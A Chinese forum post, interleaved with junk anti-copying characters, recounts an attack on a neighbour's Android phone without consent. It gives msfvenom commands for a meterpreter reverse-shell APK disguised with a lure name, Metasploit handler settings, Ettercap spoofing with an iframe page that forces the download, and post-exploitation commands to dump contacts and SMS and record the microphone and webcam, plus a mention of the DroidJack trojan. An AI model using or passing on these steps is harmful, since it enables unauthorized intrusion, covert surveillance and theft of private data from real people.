找回密码
 立即注册
查看: 2871|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 X2 V: S2 i" @% s$ T 五、msf+ettercap入侵邻居安卓手机 & k( r" Z: F- R5 {9 D) \

. G, z" E* x" d& H( [

. m/ z5 x$ w$ W) R% l 首先启动msf + k1 ^4 e" g& p$ h$ p

8 U7 J% n- E# o4 [) }% N7 J

3 I$ g! @6 L7 J: m$ a% B5 Z 先用kali生成一个安卓木马,如下命令: * W$ d+ q( `& S t; I; L" _

2 S4 T' q# L# |4 N' _& f

- `; x# r0 \0 j+ X4 U Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ; H* X9 h9 d2 p

; x3 }0 F6 d+ k& u

4 J# m2 V: B7 A% }: \: s2 L% W 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 O( P/ Z I5 p) Z

3 _+ R8 o* x: v4 x( q% P6 { W

6 u/ I3 g/ _1 V( @* D5 r9 E, K 然后进入msf $ E8 U v# f- y$ U" n1 s l; Y

* n6 |$ Z$ Q% c C3 v4 O6 `" d

# w' J |4 z% Z5 l use exploit/multi/handler 5 {3 E& _ {8 m0 n) X- U& q

* _6 f' D/ H7 N

3 W/ n* A. M3 ^, x9 K set payload android/meterpreter/reverse_tcp - I: i/ c* l3 }: t% A

5 A; V; L: d2 U) L$ p% }, Y

9 p( u* t' n' j& G set LHOST 192.168.0.109 //ipkailiip # y( @, p* V: z" q

+ ?7 L6 Z0 Q5 G3 Q4 E- ]9 b

7 h+ E6 I- v4 n! Z& k- i0 n" j set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) x! C8 s/ H7 t1 N

& Q2 t* ~- x+ Y6 g6 s8 u0 Q* X

6 l0 d% c3 `1 w0 ~7 G1 X Exploit T. \" P8 o% L/ \4 ]2 A6 B

& n9 g. X$ {) w' L; A% |1 v9 Q/ _6 w

, P2 K+ q2 R$ s' G# Z   / ]9 {0 N. u! H8 f+ Z2 u

* N2 V) i( Q2 U! k% g2 F! `

& `/ w) ~7 J N5 G7 N& L 下面我们开启ettercap -G ! L% b7 \- Z2 ]

( Q. g- \$ _0 G0 \* L

5 g' B( p& ~, C; O) s 我物理IP 9 x% m8 B5 b" D W/ e

. U. L1 N0 `# G& t& K

. Q2 k0 ]2 v5 l7 @- b   4 {+ D9 I. }: a: L1 m( ^

4 r0 g1 a1 s1 A5 j0 C% f1 m! L

0 L# P$ r, `) _7 q" \ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, : n' S# R | \

8 g, X, Y# q- U& b% H7 ^" C4 [5 ^

9 `% n6 B5 Q2 X, x" k( F) C 下面我们来设置一下 0 I4 f; J0 V# m; c$ [, @2 _; l' }: m

; ?6 p3 V3 r4 w6 ?

, E/ R& T/ S7 c7 c1 F   3 c4 ? m I% ^ ~; D

5 d1 M2 P& `6 w G7 H1 S0 [

; I7 g p" C$ K 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , H4 ^( A4 |6 z

: _/ t4 j k, k& L' M; J

4 C O6 o) `/ F4 ^3 M3 y   6 ~9 c- s9 G( Z \

9 S0 U7 r- G: j) \& q8 E

$ E( \5 {( K+ @- L& L I$ S   ! H0 I0 \/ G; ?5 f U, h

$ ^" Q& {0 b# N

/ U* x5 E! @, Y2 e2 F3 S   8 P7 H, V/ j* g

; {6 m* ~0 d& V) e

/ k/ j8 E' b+ \9 T   , a7 ?8 Q5 j; c* D

! }4 O' S* m; E

+ r" w# V: I! N   4 q# _ K/ {2 X+ U& D$ F4 P

$ R' G2 o# w- C" Y7 |* e8 _

- N0 j4 j( e/ D! X R   9 g* }2 Y& p$ J8 h% ]1 |

9 G" m w9 s1 ^

7 ^* F6 u/ k# M) e5 `" G( C0 q; |   # \) R0 O. ^6 ?! `5 H

0 u- R ^ |! |6 [7 U& X

( l( w+ R7 N7 P3 y% E. ]   " F5 T; x& L# ~8 {7 v

/ d( D4 T0 g0 l+ M

5 u, W+ {+ D8 X   g% Z) s% ^. Y$ [" v8 A* F9 ~5 }

7 J( w0 v% z; d3 u1 R

; Z1 b. \8 \% A0 i+ R   7 [3 c' p' \5 H" [1 o9 h5 c" i/ t

6 z P1 P0 f) R9 h/ |

) \& `$ f+ ]0 R# V   - h" S2 J ?2 v' A8 ?+ Z8 `( o; E

0 E0 v: n/ f8 K

5 }# o* T) J( Z   I4 q9 ]9 k0 J

! Z& T, u3 i; v s( Q9 L' h4 M

4 N3 D! E9 T3 d* `   # O4 W5 I, f+ X

: \. m0 Y! K( ^4 g$ e

" W- h, ~: K8 A' p 下面我们开始攻击 / c* c5 B! k6 ]& I

7 s/ [8 h, w# }, q% T0 N

, V2 H! M9 t! A( |) b5 V7 ]8 _   / I, E- W/ E, r' G2 Q4 t! i2 ?

8 [7 X5 b. S# |; ]# |

4 ]$ ?3 i. @/ d0 ] ?0 l   # y" [9 f+ d8 u7 W

! z" u$ z" w1 }- |6 `1 t

" m3 L7 p w. W" H   8 L- U9 W2 T7 D* @' z" w' A

0 S8 w* ]2 _8 w# h% E

0 V T0 Y) A- p9 T   : w' }" n* O/ I( {) l/ p

( o. V6 M* a1 d& B- j

c1 \/ E4 `% {& S0 L$ U% u   " G3 G# P0 L0 t. {) c

. y0 Y2 \( [. A+ c/ I6 w* P

! [, R% e8 ~! _0 m2 H1 J2 M 大概过了5分钟多,发现反弹成功了 ' l, R" q7 H7 R9 T. ^

& n$ h" M( k; K# f; r1 A

1 y- M5 F" E) w' C   & a9 M& O( q: f& e

; |- Y( ]9 E* g

# U; S, @! [3 y# ]   ' X1 i3 J3 n" |" L r; M8 V0 u6 n

$ D- i- l) Z; [7 q0 `

& J' W+ Z S# l9 [   & k( n M% P2 d" d0 ^

. P$ U, [- Q8 A" \. K: g

/ e7 }% H. R# F, R6 K8 R7 d   ; h9 z# t& G- y* f9 c- x: ~

3 L- b+ a( l7 H: u: c3 J

0 B( p! A, O! s- J   ; J0 w( Q& J- L' y! l$ u: X/ \

( N) o, j5 K b2 z: g8 G, r3 ]

# y) E D$ ~/ y' V4 l$ \; @   " w3 h/ z, N8 Z/ g. i

+ F$ i2 S0 _- Q2 H

# M. ^) g. B0 R* G! \" D7 ]   4 t" Z& k* m) b( A$ _6 R

& ? x2 ]% ?: t: R5 u

3 u& Q- }( V1 g' C6 V 执行命令 / U4 Y, d2 N$ k. F) n0 Y T% Q

/ V2 t$ I) d. m& f

8 `8 o$ n; ^. N1 O   6 l: S, t8 i2 `# l% y# \- m

' K# C4 \+ {7 y$ r) ^& z4 m7 J; I

$ E& H6 o; L/ L" z8 n dump_contacts    --》这个是导出电话 7 k M+ O: }& H' I8 _

6 W: Y4 t- d4 i. R0 r

0 X1 H: _! M8 u6 r dump_sms --》这个是导出信息 % n3 Z; [" |: L; {( n4 ~6 [" c* F

* V5 g4 _' l& ~( p, @4 n7 o

. y% R( S- ]# r/ I record_mic     Record audio from the default microphone for X seconds # ]0 @5 T7 ]0 N- S% k; ?' m

8 F8 r' d0 ~" `

9 Q# e/ g7 }- l3 r) R$ p     webcam_chat    Start a video chat 0 V2 }* a& ?" ^4 g6 l. y0 W! E+ E v

9 c' I. g8 c: E

$ }5 L$ R, b2 Z! l. ]( v+ _% N. R     webcam_list    List webcams 0 p' _0 n, b4 t9 x5 s. ~

4 G i( l: l; ]' v. m

2 ^' ], T! U6 \1 U     webcam_snap    Take a snapshot from the specified webcam 3 o+ `/ o: K: T5 d4 i! Z

b9 o9 O, k K! s7 q

, @' y( A( r- |+ P webcam_stream  lay a video stream from the specified webcam , c; H- R8 B$ O3 R+ ^ x

# Y+ ?2 _4 F$ `# Q y- p7 `

6 L7 V2 K1 @' t8 U# a+ [   / w* ]' `& S. v) M# J5 v8 }

( e7 x; f' N" R6 r' u' y; k

1 a6 A' v0 m8 `2 {3 R, d9 X   + K0 a' q, h: W

% T+ b8 [3 V; B* p

7 l2 v. {2 | v1 P+ f& i0 l 我们打开看一下电话薄, 9 o: @9 k' q4 ^% K" S$ v4 j7 T

5 v& o" E) v' ]% k2 Y+ R; B `* M6 Y

' ^9 X& d$ ]! ~+ T: l" r6 f' S   7 \% o2 e* @' F0 l: U( o

1 q3 s0 K& T, e3 A( V1 V; ?9 T( L

; E) l8 o5 a/ ? g7 s! [- s, I   $ a4 Z; B5 ]1 @3 ?1 R9 M/ ^3 w

( }# v6 ^2 p& T0 O

. M$ k3 z+ P. T3 |& z0 C' M   ( [: `$ f/ g3 I% M1 {

# S+ [0 D2 F- M

; G& C' `4 o! N q% r) o   2 F& y% X' J( c7 {0 ]% G! M

2 D! z6 S' W2 `: y' U3 q

6 J. Q0 `1 I w4 v b0 m% h- c/ g% i6 b   , d* M6 u* K# }4 ^# @8 ]

& O, C0 _0 t, T: R

/ L' r' o; M+ \ a   1 \% A J. `& r$ T! I

8 x+ H4 c0 A/ z; {! K

7 }) \* p% U1 u0 z" V4 ]1 K 我们同时欺骗成DroidJack木马,使用方法如图: & u% E& o D7 O+ y7 Q7 v$ @

9 Z/ m5 S/ h) z4 K1 W, P+ v' O$ x

- `9 V, L1 Y9 {4 |, V+ Y: d, E   : K3 q2 s' ^6 J. C( R& K

8 e8 X, l ~" q9 l

- k; ~2 Q, B8 K9 Z) Z, r: u   9 M) n+ \3 {( B; l0 a4 r" E

1 q4 c% ~4 r. L' O# u

% c! l$ [* ^+ z   $ m. y$ B+ y8 p8 M) u; K

" C( J7 F3 M4 e+ L* l

/ ?4 r4 A0 `0 m% u8 N& R3 N6 J 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 / Z! `& G5 J9 ]' m) \' b

% t6 q5 g' Z4 w, q I

2 @( o" `( g: U$ a, J   # z- q$ s9 N1 p

0 p: I. y; V9 d" p

' ]* o. N' I, s3 d3 ?) }) B& ?' Z   5 |, V* n4 u7 @6 ]$ h+ P/ j

! k- M! a. w8 M% B, K" k. `, E

% l0 E& \8 R+ P7 B& K' I# i- L0 L: _9 N   3 `) ^4 f* l/ `( W+ I# [

; m7 G1 n* \4 D2 r

2 |% ~) G% B( X' P ( v& L' m+ I6 F* z- h# x

4 |! R4 \3 `' w4 a% @

' h8 k# j Z, h
5 y F2 }" H# N. M

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表